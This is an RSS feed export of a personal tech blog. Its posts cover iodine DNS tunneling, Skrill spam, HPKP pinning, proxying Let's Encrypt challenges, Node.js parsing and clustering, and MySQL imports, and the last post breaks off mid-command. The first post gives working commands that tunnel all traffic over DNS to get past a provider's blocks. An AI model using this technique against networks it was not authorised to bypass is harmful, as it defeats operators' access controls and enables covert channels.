<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Purple haze]]></title><description><![CDATA[My blog is better than someone else's blog]]></description><link>http://blog.roundside.com/</link><generator>Ghost v0.4.2</generator><lastBuildDate>Mon, 20 Apr 2026 01:21:51 GMT</lastBuildDate><atom:link href="http://blog.roundside.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[DNS tunneling to the rescue]]></title><description><![CDATA[<h3 id="stucksomewherewithouttheinternetreadon">Stuck somewhere without the Internet? Read on!</h3>

<blockquote>
  <p>This is just another post about Iodine and DNS tunneling. Some kind of memo.</p>
</blockquote>

<p>So, service provider is blocking almost everything but DNS queries? It's time for Iodine.</p>

<p><a href='https://github.com/yarrick/iodine' >DNS tunnelling</a> is not the fastest (like VPN or ICMP tunneling) and not most useful, but it works almost always.</p>

<p>All that needed is: own domain name, server with iodined and client with iodine.</p>

<blockquote>
  <p>It's important to have the same version on client and server. There are no backward compatibility.</p>
</blockquote>

<p>Setup subdomains:</p>

<ul>
<li><strong>NS</strong> record for Iodine: <strong>iodine.example.org</strong> pointing to <strong>Iodine server</strong> ip address</li>
<li><strong>A</strong> record for resolving hostname: <strong>tun.example.org</strong></li>
<li>Set <strong>NS record</strong> for tun.example.org to  iodine.example.org</li>
</ul>

<p>OK, now all requests to *.tun.example.org should go to Iodine. <br />
Start server:</p>

<pre><code class="shell">iodined -c -f 10.10.10.1 tun.example.org -P p@SSwoRd -DD  
</code></pre>

<ul>
<li>c - disable checks for client's ip </li>
<li>f - run in the foreground</li>
<li>10.10.10.1 - subnet for virtual network</li>
<li>tun.example.org - domain for listening</li>
<li>P - password</li>
<li>DD - double debug</li>
</ul>

<p>Let's check it (online check is available at <a href='http://code.kryo.se/iodine/check-it/' >http://code.kryo.se/iodine/check-it/</a>):</p>

<pre><code class="bash">dig srv z001.tun.example.org +short  
hpiyxampo.md.

dig txt z1.tun.example.org +short  
"tpiys2"  
</code></pre>

<p>Iodine will reply with random string for any requests starting with 'z'.</p>

<p>Now, let's start iodine client:</p>

<pre><code class="shell">iodine -r -m226 -OBase64u -L0 -P p@SSwoRd tun.example.org  
</code></pre>

<ul>
<li>r - skip RAW UDP mode</li>
<li>m226 - set a fragment size of 226 bytes</li>
<li>OBase64u - force the downstream encoding type to base64u</li>
<li>L0 - force legacy (non-lazy) mode</li>
<li>tun.example.org domain to use for queries</li>
</ul>

<p>Great article and more examples <a href='http://wiki.attie.co.uk/wiki/Tunnel_IP_through_DNS' >here</a>.</p>

<p>Cool, let's try to ping server via virtual dns0 device:</p>

<pre><code class="shell">[root@host ~ ] ping 10.10.10.1
PING 10.10.10.1 (10.10.10.1) 56(84) bytes of data.  
64 bytes from 10.10.10.1: icmp_seq=1 ttl=64 time=50.6 ms  
64 bytes from 10.10.10.1: icmp_seq=2 ttl=64 time=54.2 ms  
64 bytes from 10.10.10.1: icmp_seq=3 ttl=64 time=65.9 ms  
64 bytes from 10.10.10.1: icmp_seq=4 ttl=64 time=63.4 ms  
^C
--- 10.10.10.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms  
rtt min/avg/max/mdev = 50.666/58.604/65.983/6.324 ms  
</code></pre>

<p>So far so good.</p>

<p>The final part, <strong>routing</strong></p>

<p>The easiest way to route requests to Iodine server is ssh dynamic tunneling (ssh -D ${port} user@server) which will create SOCKS server on the host machine. <br />
But if our requests is encrypted with TLS or other suite we can route all traffic directly throught DNS tunnel (Iodine's <strong>password is using for authentication only</strong>, <strong>data is not encrypted at all</strong>).</p>

<p>Server should have enabled forwarding, NAT and ACCEPT rules or policy in the FORWARD chain:</p>

<pre><code class="bash">echo 1 &gt; /proc/sys/net/ipv4/ip_forward &amp;&amp;  
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -j MASQUERADE  
</code></pre>

<p>To route all data through tunnel:</p>

<ul>
<li>add route for service provider's DNS resolvers</li>
</ul>

<pre><code class="shell">[user@host ~ ] cat /etc/resolv.conf
nameserver 10.10.100.117  
nameserver 10.10.100.118

[user@host ~ ] ip r
default via 10.11.58.1 dev wlan0  
10.11.58.0/24 dev wlan0 proto kernel scope link src 10.11.58.114  
</code></pre>

<ul>
<li>adding routes for DNS servers</li>
</ul>

<pre><code class="bash">route add -host 10.10.100.117 gw 10.11.58.1  
route add -host 10.10.100.118 gw 10.11.58.1  
</code></pre>

<ul>
<li>delete default gateway and set it to dns0</li>
</ul>

<pre><code class="bash">ip r del default &amp;&amp; ip r add default via 10.10.10.1  
</code></pre>

<pre><code>[user@host ~ ] ip r
default via 10.10.10.1 dev dns0  
10.10.10.0/27 dev dns0 proto kernel scope link src 10.10.10.2  
10.10.100.117 via 10.11.58.1 dev wlan0  
10.10.100.118 via 10.11.58.1 dev wlan0  
10.11.58.0/24 dev wlan0 proto kernel scope link src 10.11.58.114  
</code></pre>

<ul>
<li>yup:</li>
</ul>

<pre><code>[root@jupiter ~ ] ping example.org -c 3
PING example.org (93.184.216.34) 56(84) bytes of data.  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=1 ttl=53 time=1023 ms  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=2 ttl=53 time=1025 ms  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=3 ttl=53 time=2047 ms

--- example.org ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2047ms  
rtt min/avg/max/mdev = 1023.155/1365.228/2047.387/482.360 ms, pipe 2  
</code></pre>

<p>Thanks for reading.</p>]]></description><link>http://blog.roundside.com/dns-tunneling-to-the-rescue/</link><guid isPermaLink="false">5712153b-2a99-41b5-a316-d6c653ffa9da</guid><category><![CDATA[fun]]></category><category><![CDATA[linux]]></category><category><![CDATA[networking]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 27 Aug 2017 22:13:35 GMT</pubDate></item><item><title><![CDATA[Why you should  never use your primary email address with Skrill]]></title><description><![CDATA[<h3 id="astoryaboutskrillcasinorelatedspam">A story about Skrill casino related spam</h3>

<p>Recently I created an account on <a href='https://www.skrill.com/' >Skrill</a> (ex Moneybookers) to receive payments directly to my credit card. <br />
Just a common thing, I thought. How wrong I was...</p>

<p>The next morning after registration I was really <strong>surprised</strong>.</p>

<p>I saw about <strong>2 thousands</strong> delivery-error messages from different SMTP servers. All messages has a "return-path" to my domain email address (info@mydomain.com) and was send from  many different servers. What the hell?</p>

<p>Also I saw a lot of spam messages to my email address which I used to register Skrill account (that email was also used a while on cloudflare). Those emails has my first and second names, and my second name was set on <strong>Skrill account only</strong>. </p>

<p>There are some subjects from that spam messages:</p>

<ul>
<li>"Sign up now and you can redeem your £€$1000 FREE immediately!"</li>
<li>"Casino Classic offers all new real cash players £€$500 and 1 hour to win!"</li>
<li>"CasinoClassic is offering 500 free with one hour play to all new account holders!"</li>
</ul>

<p>I googled about that, and found a lot of posts like <a href='http://www.webhostingtalk.com/showthread.php?t=1110225' >this</a>. That post dated 2011, so after 5 years <strong>Skrill still will sold your email address to spamers</strong>. </p>

<p>I dunno what else to say. Besides that Skrill is a piece of sh*t. Good company, especially finance will never give any of your information to spamers.</p>

<p><strong>If you still decide to use Skrill - use public email service</strong>, never use your own domain-based email otherwise you may have a real trouble with spam.</p>

<p>Take care.</p>]]></description><link>http://blog.roundside.com/why-you-should-almost-never-usu-your-own-email-address-with-skrill/</link><guid isPermaLink="false">4bb73fda-8213-4aae-a4df-c2a8d05dd186</guid><category><![CDATA[spam]]></category><category><![CDATA[skrill]]></category><category><![CDATA[money]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Fri, 23 Sep 2016 02:24:48 GMT</pubDate></item><item><title><![CDATA[HPKP as another security layer]]></title><description><![CDATA[<h3 id="usinghttppublickeypinningforsuperdupersecurity">Using HTTP Public Key Pinning for SuperDuper ™ security</h3>

<p>Happily, <a href='https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security' >HTTP Strict Transport Security</a> is very nice thing for trust-on-first-use sites. But there are one thing that haunts me sometimes - hacked CA. Sure, that's quite rare thing, but who knows. <br />
So, some iranian guy's want to do some MIM. They hacked some CA, issue fake (but valid) ssl certificates and ... the end. Or not?</p>

<p>Nope, if <a href='https://developer.mozilla.org/en/docs/Web/Security/Public_Key_Pinning' >HPKP</a> is used and it's TOFU web site. <br />
The idea is pretty simple: <br />
when UA makes first trusted (I hope) connection to server - it receives HPKP header(s) and store certifiates SPKI fingerprints, ttl, and other validation options for that domain. Then, in all further connections UA will check certificate for identity (whole validation process descirbed in <a href='https://tools.ietf.org/html/rfc7469' #section-2.6">rfc7469</a>.</p>

<p>HPKP headers looks like this:</p>

<pre><code>Public-Key-Pins: max-age=2592000;  
       pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
       pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";
       report-uri="http://example.com/pkp-report";
       includeSubDomains
</code></pre>

<p>where <br />
<strong><em>max-age</em></strong> - ttl for storing headers and fingerprints <br />
<strong><em>pin-sha256</em></strong> - SPKI fingerprints (sha256 is  only supported for now) for at least two certificates <br />
<strong><em>report-uri</em></strong> - uri for send POST request in case of failed validation (optional) <br />
<strong><em>includeSubDomains</em></strong> - include subdomains to pinned connections (optional)    </p>

<h4 id="okitsagametime">Ok, it's a game time</h4>

<p><strong><em>Let's create Subject Public Key Info fingerprints for example.org</strong></em> (detailed about SPKI - <a href='https://tools.ietf.org/html/rfc7469' #section-2.4">here</a>) <br />
Easiest way is to create it from server certificate using openssl:  </p>

<pre><code class="nohighlight">openssl s_client -servername example.org -connect example.org:443 | openssl x509 -pubkey -noout | oubin -outform der | openssl dgst -sha256 -binary | openssl enc -base64  
</code></pre>

<p>Here it is  </p>

<pre><code>depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3  
verify return:1  
depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X1  
verify return:1  
depth=0 CN = example.org  
verify return:1  
writing RSA key  
TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c=  
</code></pre>

<p>Now, it's time to add this key in headers and set ttl for pinning. But before doing this, we need another SPKI fingerprint for bad situation when original key was compromized. Due to <a href='https://tools.ietf.org/html/rfc7469' >rfc</a> in headers must be <strong>at least two pin's</strong>. So, for correct pinning we need at least two private keys and certificates: <strong>original and back-up</strong> (preferable from another CA). Sure, no-one can forbid us to put some garbage in back-up pin(s), just for testing purposes.</p>

<p><strong><em>About max-age</em></strong></p>

<p>There are no limits for max-age, but UA's <strong>may set own limits</strong>. Guys from google recommends somethig around 60 days:</p>

<blockquote>
  <p>There is probably no ideal upper limit to the max-age directive that
     would satisfy all use cases.  However, a value on the order of 60
     days (5,184,000 seconds) may be considered a balance between the two
     competing security concerns.</p>
</blockquote>

<p><strong><em>About report-uri</em></strong>  </p>

<p>Very cool feature as for me. UA will make POST request with useful info to specified uri when valid pinned connection can't be established. The little problem: only Chrome >=46 (and Chromium I suppose) can do this for now.</p>

<p>Sample HPKP-report from Chrome:</p>

<pre><code>#headers
{ host: 'blog.roundside.com',
  connection: 'close',
  'content-length': '8710',
  pragma: 'no-cache',
  'cache-control': 'no-cache',
  'user-agent': 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36',
  'accept-encoding': 'gzip, deflate',
  'accept-language': 'en-US,en;q=0.8' }
#payload (certifiates was truncated)
{
"date-time":"2016-03-13T16:54:14.023Z",  
"effective-expiration-date":"2016-03-13T16:57:54.368Z",  
"hostname":"blog.roundside.com",  
"include-subdomains":false,  
"known-pins":[  
"pin-sha256=\"MbJIcRLFNfwcfRUpV46EtDyp0d8WO8o34sMALixkftU=\"",  
"pin-sha  
256=\"w5k2T/1B4J1cdxlhfUnpY1SIL1+n26NFv8fTdEs2ThM=\""],  
"noted-hostname":"blog.roundside.com",  
"port":443,  
"served-certificate-chain":[  
"-----BEGIN CERTIFICATE-----    \nMIIFCDCCA/CgAwIBAgISAUijX+5SwJtgdqwJUUDBNjrCMA0GCSqGSIb3DQEBCwUA\nMEoxCzAJBgNVBAYTAlVTMRYwFAYD....Y4=\n  
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----  
\n...2k5xeua2zUk=\n
-----END CERTIFICATE-----\n"
],
"validated-certificate-chain":[  
"-----BEGIN CERTIFICATE-----\n  
...4=\n
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----\n  
...2k5xeua2zUk=\n
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----\n  
MII....UQ\n  
-----END CERTIFICATE-----\n"
]}
</code></pre>

<p><em><strong>served-certificate-chain</strong></em> - is exactly certificate chain received from server. <br />
<em><strong>validated-certificate-chain</strong></em> - is what UA trying to verify after first fail. Usually - the same as <strong>served-certificate-chain</strong> + Root CA certificate from UA.</p>

<p>Ok, so let's setup a proper header using SPKI fingerprints and recommended max-age:</p>

<pre><code>Public-Key-Pins  
pin-sha256="TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c=";  
pin-sha256="M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE=";  
max-age=5184000;  
report-uri="http://example.org/pkp-report"  
</code></pre>

<p>Check it:</p>

<pre><code>curl -I "https://example.org"  
HTTP/1.1 200 OK  
Public-Key-Pins: pin-sha256="TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c="; pin-sha256="M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE="; max-age=5184000; report-uri="http://example.org/pkp-report";  
Date: Mon, 14 Mar 2016 00:23:29 GMT  
Connection: keep-alive
</code></pre>

<p>Seems ok.</p>

<p><em><strong>How to test?</em></strong> <br />
Testing pinned connections is not trivial for now. The are some ways to verify HPKP status: in <strong>Firefox</strong> "Network" tab -> "Security": "Public Key Pinning", also <a href='https://report-uri.io/home/pkp_analyse' >HPKP Analyser</a> is good tool.</p>

<p>For actually testing HPKP we need to <strong>replace pinned certificate to other valid certificate</strong> but not pinned. Just changing fingerpints doen't have any action coz UA can't update HPKP headers due certificate and fingerprint conflict and will keep old headers unchanged.</p>

<p><strong>Ok, let's put not pinned certificate on this blog</strong>    </p>

<p><em>Chrome reaction:</em> <br />
<img src='http://files.roundside.com/content/hpkp_ch.png' > <br />
<em>Firefox reaction:</em> <br />
<img src='http://files.roundside.com/content/hpkp_ff.png' ></p>

<p>The cool thing - there no "proceed anyway" button, which in very good for security.</p>

<p><em><strong>So, HPKP &amp; HSTS is not ideal but can greatly reduce MIM attacks.</strong></em></p>

<p>Further reading: <br />
<a href='https://tools.ietf.org/html/rfc7469' >RFC</a> <br />
<a href='https://developer.mozilla.org/en/docs/Web/Security/Public_Key_Pinning' >MDN</a> <br />
<a href='https://developers.google.com/web/updates/2015/09/HPKP-reporting-with-chrome-46?hl=en' >Google</a> <br />
<a href='https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning' >OWASP</a> <br />
<a href='https://report-uri.io/home/pkp_analyse' >HPKP Analyser</a></p>]]></description><link>http://blog.roundside.com/hpkp-as-another-security-layer/</link><guid isPermaLink="false">a246fcea-40f2-47a2-b2c0-86583dcc1d3a</guid><category><![CDATA[security]]></category><category><![CDATA[http]]></category><category><![CDATA[ssl]]></category><category><![CDATA[https]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 13 Mar 2016 19:08:29 GMT</pubDate></item><item><title><![CDATA[Proxying letsencrypt acme-challenge requests]]></title><description><![CDATA[<p><img src='https://letsencrypt.org/images/letsencrypt-logo-horizontal.svg' > <br />
<a href='https://letsencrypt.org/' >Let’s Encrypt</a> is cool enough. But I personally run into problem with fqdn verification, letsencrypt client should be invoked from the same ip that domain has.   </p>

<p>So if u wanna ssl certificate for <strong>example.org</strong> (which obviously has ipv4  address 93.184.216.34) but want generate certificate(s) from some another server <strong>letsencrypt.example.org</strong> (e.g. micro aws instance or so with ip 93.184.216.32) you out of luck. There are several workarounds explicitly described in <a href='https://letsencrypt.github.io/acme-spec/' #rfc.section.7">rfc</a>. But they can't be automated easily, moreover certificates issued for 90 days, so automation is a good choice here.</p>

<p>But, if you own your servers or have access to server/application configs - there are elegant solution. We need just proxying letsencrypt acme-challenge request from <strong>example.org</strong> to that server where letsencrypt run's and use <a href='http://letsencrypt.readthedocs.org/en/latest/using.html' #webroot">webroot</a> native plugin (<a href='http://letsencrypt.readthedocs.org/en/latest/using.html' #standalone">standalone</a> is also usable, but not flexible at all).</p>

<p>In a nutshell:</p>

<p>Let’s Encrypt service want receive acme-challenge from example.org, it make request to unique address (hash) after <code>/.well-known/acme-challenge/</code> path. So when <code>example.org/example.org/.well-known/acme-challenge/{$hash}</code> has correct hash path and value - certificate will be issued.</p>

<p>Process is something like this:  </p>

<pre><code class="syntax-bash">#letsencrypt client sends to letsencrypt service dns, hash and value
1) letsencrypt.example.org -&gt; letsencrypt service [example.org &amp; $hash &amp; $value]  
#letsencrypt service make request and obtain value (if so)
2) letsencrypt service -&gt; example.org/.well-known/acme-challenge/{$hash}  
#and if all is ok
3) letsencrypt service -&gt; letsencrypt.example.org &lt;storing key and certificate&gt;  
</code></pre>

<p>Example from <a href='http://letsencrypt.readthedocs.org/en/latest/using.html' #webroot">http://letsencrypt.readthedocs.org/</a>:  </p>

<pre><code>66.133.109.36 - - [05/Jan/2016:20:11:24 -0500] "GET /.well-known/acme-challenge/HGr8U1IeTW4kY_Z6UIyaakzOkyQgPr_7ArlLgtZE8SX HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"  
</code></pre>

<p>First of all, we need to specify webroot <a href='http://letsencrypt.readthedocs.org/en/latest/using.html' #webroot">plugin</a>, <strong>authenticator</strong> (used for <code>certonly</code>) and acme-challenge <strong>location</strong> for letsencrypt client:</p>

<pre><code>./letsencrypt-auto certonly -w /opt/ssl/example.org --authenticator webroot --email bob@example.org -d example.org
</code></pre>

<p>In this case letsencrypt client will write verification file to /opt/ssl/example.org and tell letsencrypt service to make verification request.</p>

<p>Now, just one simple change in <strong>example.org</strong> server config (nginx in my case):</p>

<pre><code>location  "/.well-known/acme-challenge/" {  
    proxy_pass http://letsencrypt.example.org;  
}
</code></pre>

<p>Ok, all acme-challenge requests now goeing to <strong>letsencrypt.example.org</strong>.</p>

<pre><code>letsencrypt service -&gt; example.org/.well-known/acme-challenge/{$hash} -&gt; letsencrypt.example.org  
</code></pre>

<p>And now we just need to <strong>serve acme-challenge hash file</strong> using favorite method (nginx, Node, Python, netcat :D). For testing, python one-liner will be enough:  </p>

<pre><code>cd /opt/ssl/example.org &amp;&amp; python -m "SimpleHTTPServer" 80  
</code></pre>

<p>Ok, cool:  </p>

<pre><code>IMPORTANT NOTES:  
 - Congratulations! Your certificate and chain have been saved at
   /etc/letsencrypt/live/example.org/fullchain.pem. Your cert
   will expire on 2016-06-03. To obtain a new version of the
   certificate in the future, simply run Let's Encrypt again.
 - If you like Let's Encrypt, please consider supporting our work by:

   Donating to ISRG / Let's Encrypt:   https://letsencrypt.org/donate
   Donating to EFF:                    https://eff.org/donate-le
</code></pre>

<p>That method is extremely easy to configure and automate, for receiving certificates from dozen different domains using one letsencrypt endpoint.</p>

<p><em>Note: letsencrypt has a limit (around 5) for certificates per week.</em></p>

<p>Cheers :)</p>]]></description><link>http://blog.roundside.com/proxying-letsencrypt-acme-challenge-requests/</link><guid isPermaLink="false">ed825179-6575-428c-bebe-cfc479f108ce</guid><category><![CDATA[ssl]]></category><category><![CDATA[servers]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Tue, 01 Mar 2016 08:41:00 GMT</pubDate></item><item><title><![CDATA[Using internal HTTPParser for fun and tests]]></title><description><![CDATA[<p>If you wanna use Node's http(s) library but don't want run/simulate http server - read on :)</p>

<p>So, for using native http parser, which in a nutshell are C library binded to Node with a bunch of internal helpers and local functions we need just a several lines of code.</p>

<pre><code class="code-javascript">/**
 * using internal .binding method
 */

var HTTPParser = process.binding('http_parser').HTTPParser;

/**
 * specify that wee wanna parse request
 *  HTTPParser.REQUEST == 1
 *  HTTPParser.RESPONSE == 0
 */

var parser = new HTTPParser(HTTPParser.REQUEST);

//closure, just for convenience
var log = console.log;

/**
 * creates new Buffer and pass it to parser
 * @param {Buffer} buffer
 */

function parse(buffer) {  
  var _data = new Buffer(buffer);
  //this method is described below
  parser.execute(_data, 0, _data.length);
}

/**
 * set event emitters
 */

parser.onHeadersComplete = function(headers) {  
    log(".onHeadersComplete, arguments: \n%s\n", JSON.stringify(arguments));
}
parser.onMessageComplete = function() {  
    log(".onMessageComplete invoked");
}
parser.onBody = function(body, start, len) {  
    log(".onBody, arguments: \n%s\n", JSON.stringify(arguments));
    log(body.toString());
}

/**
 * Make tests with proper requests
 */

//single string
parse("GET / HTTP/1.1\r\nhost:google.com\r\ncontent-length: 0\r\n\r\n");

//multiline
parse("PUT /api/v1/spot HTTP/1.1\r\n");  
parse("content-type: application/json\r\n");  
parse("host: example.com\r\ncontent-length:31\r\n\r\n");  
parse("{\"stock\": \"AAPL\", \"price\": 643}");
</code></pre>

<p>Results: <br />
single string  </p>

<pre><code class="code-javascript">.onHeadersComplete, arguments: 
{"0":{"headers":["host","google.com","content-length","0"],"url":"/","method":"GET","versionMajor":1,"versionMinor":1,"shouldKeepAlive":true,"upgrade":false}}

.onMessageComplete invoked
</code></pre>

<p>and multiline one  </p>

<pre><code class="code-javascript">.onHeadersComplete, arguments: 
{"0":{"headers":["content-type","application/json","host","example.com","content-length","31"],"url":"/api/v1/spot","method":"PUT","versionMajor":1,"versionMinor":1,"shouldKeepAlive":true,"upgrade":false}}

.onBody, arguments: 
{"0":[123,34,115,116,111,99,107,34,58,32,34,65,65,80,76,34,44,32,34,112,114,105,99,101,34,58,32,54,52,51,125],"1":0,"2":31}

{"stock": "AAPL", "price": 643}
.onMessageComplete invoked
</code></pre>

<p>Cool, we have headers, request line and body buffer.</p>

<hr />

<p>Btw, <strong>.execute</strong> method needs data, start and end positions <br />
let's take a peek to <code>http.js:2167</code></p>

<pre><code class="code-javascript">function socketOnData(d, start, end) {  
  var socket = this;
  var req = this._httpMessage;
  var parser = this.parser;

  var ret = parser.execute(d, start, end - start);
  if (ret instanceof Error) {
    debug('parse error');
    freeParser(parser, req);
    socket.destroy();
    req.emit('error', ret);
    req._hadError = true;
  } else if (parser.incoming &amp;&amp; parser.incoming.upgrade) {
    // Upgrade or CONNECT
    var bytesParsed = ret; 
    var res = parser.incoming;
    req.res = res;
    ...
</code></pre>

<p>Also, <a href='https://www.npmjs.com/' ~loadaverage">here</a> is npm module with this stuff.</p>]]></description><link>http://blog.roundside.com/using-internal-httpparser-for-fun-and-tests/</link><guid isPermaLink="false">c988d3d9-9115-42b4-a183-c16b2e2af9e0</guid><category><![CDATA[node.js]]></category><category><![CDATA[http]]></category><category><![CDATA[parsing]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Fri, 12 Feb 2016 08:16:09 GMT</pubDate></item><item><title><![CDATA[Clustering Node.js apps]]></title><description><![CDATA[<p>Yes, Node is fast enough. But it only uses a single thread, so we can make it much faster in most cases (on a multithreaded systems of course).</p>

<p>Nice documentation about clustering in Node.js is <a href='https://nodejs.org/api/cluster.html' >here</a></p>

<p>In a nutshell, master process will just share connections between forked processes. There are some useful events for processes monitoring and re-forking they in case of trouble.</p>

<p>Let's create an extra-simple web-server:  </p>

<pre><code class="syntax=javascript">var http = require('http');  
http.createServer(function (req, res) {  
  res.writeHead(200, {'content-type': 'text/plain'});
  res.end('Hello World!');
}).listen(3000)
</code></pre>

<p>I'll use <strong>wrk</strong> to run benchmark from <strong>incredible</strong> <a href='https://github.com/iron/iron/wiki/How-to-Benchmark-hello.rs-Example' >Iron</a> web framework for Rust. On my quad core vps results isn't so bad:  </p>

<pre><code>Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency   140.61ms   69.12ms 785.85ms   88.44%
    Req/Sec   398.78    247.27     1.28k    62.36%
  46600 requests in 10.03s, 6.93MB read
Requests/sec:   4646.52  
Transfer/sec:    707.87KB
</code></pre>

<p>Hmm, <strong>4646.52 request per second</strong>. <br />
Now, let's speed it up!  </p>

<pre><code class="syntax=javascript">var http     = require('http'),  
    cluster  = require('cluster'),
    coresnum = require('os').cpus().length;
if (cluster.isMaster) {  
  //master process invokes firstly and creates as many forks as cores/threads in system
  for (var i=0;i&lt;coresnum;i++) {
   cluster.fork();
  }
  cluster.on('exit', function (worker, code, signal) {
   console.log('Someone is dead, PID: ' +  worker.process.pid + ', signal: ' + signal || code);    
   cluster.fork();
  }); 
}
else {  
  //will be invoked by every fork
  http.createServer(function (req, res) {
   res.writeHead(200, {'content-type': 'text/plain'});
   res.end('Hello World!');
  }).listen(3000)
}
</code></pre>

<p>Function emitted after <strong>'exit'</strong> event will re-fork any forked process that was killed/terminated/etc. <br />
Let's kill some fork:  </p>

<pre><code>$ ps ax | grep node 
17064 pts/3    Sl+    0:00 node cluster.js  
17069 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5859 /tmp/cluster.js  
17074 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5860 /tmp/cluster.js  
17075 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5861 /tmp/cluster.js  
17080 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5862 /tmp/cluster.js  
17092 pts/2    S+     0:00 grep node  
$ kill 17074
</code></pre>

<p>Nice:  </p>

<pre><code>Someone is dead, PID: 17074, signal: SIGTERM  
</code></pre>

<p>Run wrk again:</p>

<pre><code>$ wrk -t12 -c900 -d10s http://127.0.0.1:3000/
Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency    62.34ms  144.61ms   2.00s    96.96%
    Req/Sec     1.74k   763.11     8.61k    85.76%
  178799 requests in 10.10s, 26.60MB read
  Socket errors: connect 0, read 0, write 0, timeout 413
Requests/sec:  17709.63  
Transfer/sec:      2.63MB  
</code></pre>

<p>Not bad, now we have <strong>17709.63 requests per second</strong>, not 4646.52 as before.</p>

<p>How about Iron?  </p>

<pre><code>extern crate iron;

use iron::prelude::*;  
use iron::status;

fn main() {  
    Iron::new(|_: &amp;mut Request| {
        Ok(Response::with((status::Ok, "Hello world!")))
    }).http("0.0.0.0:3000").unwrap();
}
</code></pre>

<p>Wrk again:  </p>

<pre><code>$ wrk -t12 -c900 -d10s http://127.0.0.1:3000/
Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency     1.03ms    0.95ms  20.98ms   96.66%
    Req/Sec     2.59k   563.94     4.06k    58.67%
  77369 requests in 10.05s, 8.41MB read
Requests/sec:   7698.92  
Transfer/sec:    857.11KB  
</code></pre>

<p>Since Rust is compiled language and multithreaded by default. I thin'k Node.js results is impress :)</p>]]></description><link>http://blog.roundside.com/why-you-should-clustering-youre-node-js-apps/</link><guid isPermaLink="false">9abe6d57-4d66-4401-918d-4be776c9d609</guid><category><![CDATA[load-balancing]]></category><category><![CDATA[node.js]]></category><category><![CDATA[clustering]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 05 Jul 2015 06:38:38 GMT</pubDate></item><item><title><![CDATA[Import to MySql from dump files]]></title><description><![CDATA[<p>Sometimes we need insert some data in database, and sometimes this data comes in strange format (different separators, termination characters, etc). In this case tools like phpmyadmin isn't very useful.   </p>

<p>Happily, MySql cli has all we need (and much more).   </p>

<p>Lets look at this simple dump file for example:  </p>

<pre><code class="syntax-csv">|-name-|-age-|-result-|-city-|
|Alice|23|true|Sacramento
|Bob|31|false|Austin
|Eve|25|true|Dallas
|John|23|false|undefined
|Steve|34|true|DC
</code></pre>

<p>At the top we have description for column names, below - data separated by "|", besides, all lines also begins with "|" and have a newline character at the end. <br />
Check this:  </p>

<pre><code class="syntax-bash">user@mysql:/tmp$ cat user_import.txt | od -c  
0000000   |   -   n   a   m   e   -   |   -   a   g   e   -   |   -   r  
0000020   e   s   u   l   t   -   |   -   c   i   t   y   -   |  \n   |  
0000040   A   l   i   c   e   |   2   3   |   t   r   u   e   |   S   a  
0000060   c   r   a   m   e   n   t   o  \n   |   B   o   b   |   3   1  
0000100   |   f   a   l   s   e   |   A   u   s   t   i   n  \n   |   E  
0000120   v   e   |   2   5   |   t   r   u   e   |   D   a   l   l   a  
0000140   s  \n   |   J   o   h   n   |   2   3   |   f   a   l   s   e  
0000160   |   u   n   d   e   f   i   n   e   d  \n   |   S   t   e   v  
0000200   e   |   3   4   |   t   r   u   e   |   D   C  \n  
0000215
</code></pre>

<p>This files has Unix-like LF newlines ("\n "), we will need this to specify lines terminators. <br />
Let's import it. <br />
Create new table</p>

<pre><code class="syntax-sql">mysql&gt; create table temp_users (name text, age int, result text, city text, id int auto_increment primary key) character set utf8 collate utf8_bin;  
</code></pre>

<p>and use <a href='https://dev.mysql.com/doc/refman/5.1/en/load-data.html' >load data</a> infile to insert dump into table (sure, dump file must be accessible from mysql server):  </p>

<pre><code class="syntax-mysql">mysql&gt; load data infile "/tmp/user_import.txt" into table temp_users  
    -&gt; fields terminated by "|"  
    -&gt; lines starting by "|"  
    -&gt; terminated by "\n"  
